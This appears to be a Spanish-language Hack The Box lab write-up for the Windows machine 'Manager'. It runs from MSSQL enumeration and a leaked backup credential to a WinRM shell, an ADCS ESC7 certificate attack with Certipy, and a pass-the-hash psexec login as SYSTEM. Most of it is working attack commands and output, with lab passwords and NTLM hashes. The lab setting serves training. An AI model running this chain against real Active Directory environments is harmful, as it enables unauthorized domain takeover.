Hacemos click sobre domain_users.html y listamos los usuarios del dominio y los grupos a los que pertenecen, en este caso el usuario raven pertenece al grupo Remote Management Users, lo cual significa que si obtenemos sus credenciales nos podríamos conectar a través de winrm

MSSQL Enumeration

Debido a que tenemos credenciales válidas, vamos a enumerar el servidor MSSQL usando la herramienta msdat https://github.com/quentinhardy/msdat para ver los comandos que podemos utilizar

# python3 msdat.py all -s 10.129.160.212 -D manager.htb -U operator -P operator  

[1] (10.129.160.212:1433): Testing the 'master' database with the account operator/operator
[1.1] Can the current user become sysadmin with trustworthy database method ?
[-] KO
[1.2] You can steal hashed passwords ?
[+] OK
[1.3] Can we execute system commands with xpcmdshell (directly) ?
[-] KO
[1.4] Can we re-enable xpcmdshell to use xpcmdshell ?
[-] KO
[1.5] Can you use SQL Server Agent Stored Procedures (jobs) to execute system commands?
[-] KO
[-] KO
[1.6] Can you capture a SMB authentication ?
[+] ? (perhaps)
[1.7] Can you use OLE Automation to read files ?
[-] KO
[1.8] Can you use OLE Automation to write files ?
[-] KO
[1.9] Can you use OLE Automation to execute Windows system commands ?
[-] KO
[1.10] Can you use Bulk Insert to read files ?
[-] KO
[1.11] Can you use Openrowset to read files ?
[-] KO
[1.12] Can you connect to remote databases with openrowset ? (useful for dictionary attacks)
[-] KO
[1.13] Can you list files with xp_dirtree ?
[+] OK
[1.14] Can you list directories with xp_subdirs ?
[-] KO
[1.15] Can you list drives with xp_subdirs ?
[+] OK
[1.16] Can you list medias with xp_availablemedia ?
[-] KO
[1.17] Can you check if a file exist thanks to xp_fileexist ?
[+] OK
[1.18] Can you create a folder with xp_createsubdir ?
[-] KO


[2] (10.129.160.212:1433): MSSQL users have not the password identical to the username ?
The login sa has already been tested at least once. What do you want to do:                                                                                           | ETA:  00:00:00 
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |################################################################################################################################################################| Time: 00:00:41 
[-] No found a valid account on 10.129.160.212:1433 in UsernameLikePassword module

Como hay un IIS corriendo según nos representó el nmap, vamos a conectarnos y listar el contenido de la ruta en la que se aloja el IIS

# impacket-mssqlclient WORKGROUP/operator@10.129.165.27 -windows-auth                 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> xp_dirtree
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   

Documents and Settings          1      0   

inetpub                         1      0   

PerfLogs                        1      0   

Program Files                   1      0   

Program Files (x86)             1      0   

ProgramData                     1      0   

Recovery                        1      0   

SQL2019                         1      0   

System Volume Information       1      0   

Users                           1      0   

Windows                         1      0   

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub
subdirectory   depth   file   
------------   -----   ----   
custerr            1      0   

history            1      0   

logs               1      0   

temp               1      0   

wwwroot            1      0   

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

Si accedemos a esta ruta de la web http://10.129.165.27/website-backup-27-07-23-old.zip, nos descargará un zip. Descomprimimos el zip y listamos todo el contenido del archivo.

# ls -la
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  .
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:35 2024  ..
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  css
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  images
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  js
.rw-rw-r--    justice-reaper justice-reaper  698 B  Thu Jul 27 05:35:54 2023  .old-conf.xml
.rw-rw-r--    justice-reaper justice-reaper  5.3 KB Thu Jul 27 05:32:30 2023  about.html
.rw-rw-r--    justice-reaper justice-reaper  5.2 KB Thu Jul 27 05:32:14 2023  contact.html
.rw-rw-r--    justice-reaper justice-reaper   18 KB Thu Jul 27 05:32:22 2023  index.html
.rw-rw-r--    justice-reaper justice-reaper  7.7 KB Thu Jul 27 05:32:08 2023  service.html
.rw-rw-r--    justice-reaper justice-reaper 1021 KB Tue Sep 17 11:56:58 2024  website-backup-27-07-23-old.zip

En el archivo .old-conf.xml encontramos las credenciales del usuario raven

# cat .old-conf.xml   
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

Intrusión

Nos conectamos a la máquina víctima

# evil-winrm -i '10.129.165.27' -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami
manager\raven

Privilege Escalation

Sincronizamos nuestro reloj con el de la máquina víctima

# sudo ntpdate 10.129.165.27
2024-08-17 00:51:21.613694 (+0200) +408.815789 +/- 0.029180 10.129.238.223 s1 no-leap
CLOCK: time stepped by 408.815789

Nos descargamos adPEAS.ps1 de https://github.com/61106960/adPEAS.git y lo subimos a la máquina víctima.

# evil-winrm -i '10.129.165.27' -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> upload adPEAS.ps1
                                        
Info: Uploading /home/justice-reaper/Downloads/adPEAS.ps1 to C:\Users\Raven\Documents\adPEAS.ps1
                                        
Data: 4655524 bytes of 4655524 bytes copied
                                        
Info: Upload successful!

Importamos el módulo de powershell

*Evil-WinRM* PS C:\Users\Raven\Documents> Import-Module .\adPEAS.ps1

Ejecutamos adPEAS

*Evil-WinRM* PS C:\Users\Raven\Documents> Invoke-adPEAS

Nos detecta varias templates y nos recomienda usar Certipy https://github.com/ly4k/Certipy.git o Certify https://github.com/GhostPack/Certify.git

[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2

[+] Found Active Directory Certificate Services 'manager-DC01-CA':
CA Name:				manager-DC01-CA
CA dnshostname:				dc01.manager.htb
CA IP Address:				10.129.165.27
Date of Creation:			07/27/2023 10:31:05
DistinguishedName:			CN=manager-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
NTAuthCertificates:			True
Available Templates:			SubCA
					DirectoryEmailReplication
					DomainControllerAuthentication
					KerberosAuthentication
					EFSRecovery
					EFS
					DomainController
					WebServer
					Machine
					User
					Administrator

[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy

[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				SubCA
Template distinguishedname:		CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'DirectoryEmailReplication' +++++

[?] +++++ Checking Template 'DomainControllerAuthentication' +++++

[?] +++++ Checking Template 'KerberosAuthentication' +++++

[?] +++++ Checking Template 'EFSRecovery' +++++

[?] +++++ Checking Template 'EFS' +++++
[+] Identity 'MANAGER\Domain Users' has enrollment rights for template 'EFS'
Template Name:				EFS
Template distinguishedname:		CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
Extended Key Usage:			Encrypting File System
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		MANAGER\Domain Users

[?] +++++ Checking Template 'DomainController' +++++

[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				WebServer
Template distinguishedname:		CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
Extended Key Usage:			Server Authentication
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'MANAGER\Domain Computers' has enrollment rights for template 'Machine'
Template Name:				Machine
Template distinguishedname:		CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
[+] Extended Key Usage:			Client Authentication, Server Authentication
EnrollmentFlag:				AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for:		MANAGER\Domain Computers

[?] +++++ Checking Template 'User' +++++
[+] Identity 'MANAGER\Domain Users' has enrollment rights for template 'User'
Template Name:				User
Template distinguishedname:		CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
[+] Extended Key Usage:			Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		MANAGER\Domain Users

En mi caso voy a usar Certipy

# pip3 install certipy-ad

Buscamos vulnerabilidades y encontramos ESC7

# certipy-ad find -u raven@manage.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.165.27 -vulnerable -stdout  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates

Si solo tienes el derecho de acceso Manager CA, puedes otorgarte el derecho de acceso Manage Certificates añadiendo tu usuario como nuevo oficial

# certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

La plantilla SubCA se puede habilitar en la CA con el parámetro -enable-template. Por defecto, la plantilla SubCA está habilitada

# certipy-ad ca -ca manager-DC01-CA -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

Si hemos cumplido con los requisitos previos para este ataque, podemos comenzar solicitando un certificado basado en la plantilla SubCA. Esta solicitud será denegada, pero guardaremos la clave privada y anotaremos el ID de la solicitud

# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 25
Would you like to save the private key? (y/N) y
[*] Saved private key to 25.key
[-] Failed to request certificate

Con nuestros permisos de Manage CA y Manage Certificates, podemos emitir la solicitud de certificado fallida utilizando el comando ca y el parámetro -issue-request <ID de la solicitud>

# certipy-ad ca -ca manager-DC01-CA -issue-request 25 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Y finalmente, podemos recuperar el certificado emitido con el comando req y el parámetro -retrieve <ID de la solicitud>

# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 25 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 25
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '25.key'
[*] Saved certificate and private key to 'administrator.pfx'

Por defecto, Certipy intentará extraer el nombre de usuario y el dominio del certificado (-pfx) para la autenticación mediante Kerberos

# certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.165.27 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Una vez conseguido el hash NTLM del usuario Administrator podemos hacer Pass The Hashy autenticarnos con psexec

# impacket-psexec 'manage.htb/administrator@10.129.165.27' -hashes ':ae5064c2f62317332c88629e025924ef'       

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.165.27.....
[*] Found writable share ADMIN$
[*] Uploading file lBtpaDYZ.exe
[*] Opening SVCManager on 10.129.165.27.....
[*] Creating service ulyf on 10.129.165.27.....
[*] Starting service ulyf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

Hackthebox, Windows

Esta entrada está licenciada bajo CC BY 4.0 por el autor.